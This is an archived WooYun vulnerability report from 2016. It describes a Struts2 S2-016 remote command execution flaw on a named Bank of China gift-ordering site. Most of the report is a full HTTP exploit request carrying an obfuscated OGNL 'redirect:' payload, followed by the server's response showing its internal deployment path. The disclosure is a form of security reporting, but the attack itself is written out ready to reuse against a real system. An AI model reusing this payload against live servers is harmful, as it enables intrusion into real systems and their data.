乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-06-24: 细节已通知厂商并且等待厂商处理中 2016-06-24: 厂商已查看当前漏洞内容,细节仅向厂商公开 2016-06-30: 厂商已经主动忽略漏洞,细节向公众公开
rt
https://jf365.boc.cn/BOCGIFTORDERNET/defaultIndex.do
存在S2-016命令执行漏洞
POST /BOCGIFTORDERNET/defaultIndex.do HTTP/1.1Accept-Encoding: gzip, deflateConnection: Keep-AliveUser-Agent: Mozilla/5.0 (baidu spider)Host: jf365.boc.cnCookie: Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987Content-Length: 566--------------------------4a606c052a893987Content-Disposition: form-data; name="redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().print("web"),#resp.getWriter().print("path:"),#resp.getWriter().print(#req.getSession().getServletContext().getRealPath("/")),#resp.getWriter().flush(),#resp.getWriter().close()}"-1--------------------------4a606c052a893987--TTP/1.1 200 OKDate: Fri, 24 Jun 2016 14:17:24 GMTX-Powered-By: Servlet/3.0Set-Cookie: JSESSIONID=00001VXd-hGv_3A9iBJ7aBZADrE:1ad27visj; Path=/; HttpOnlyExpires: Thu, 01 Dec 1994 16:00:00 GMTCache-Control: no-cache="set-cookie, set-cookie2"Keep-Alive: timeout=1Connection: Keep-AliveContent-Language: zh-CNContent-Length: 84webpath:/websphere/IBM/WebSphere/BOCapps/BOCGIFTORDERNET_war.ear/BOCGIFTORDERNET.war
升级
危害等级:无影响厂商忽略
忽略时间:2016-06-30 02:25
漏洞Rank:15 (WooYun评价)
暂无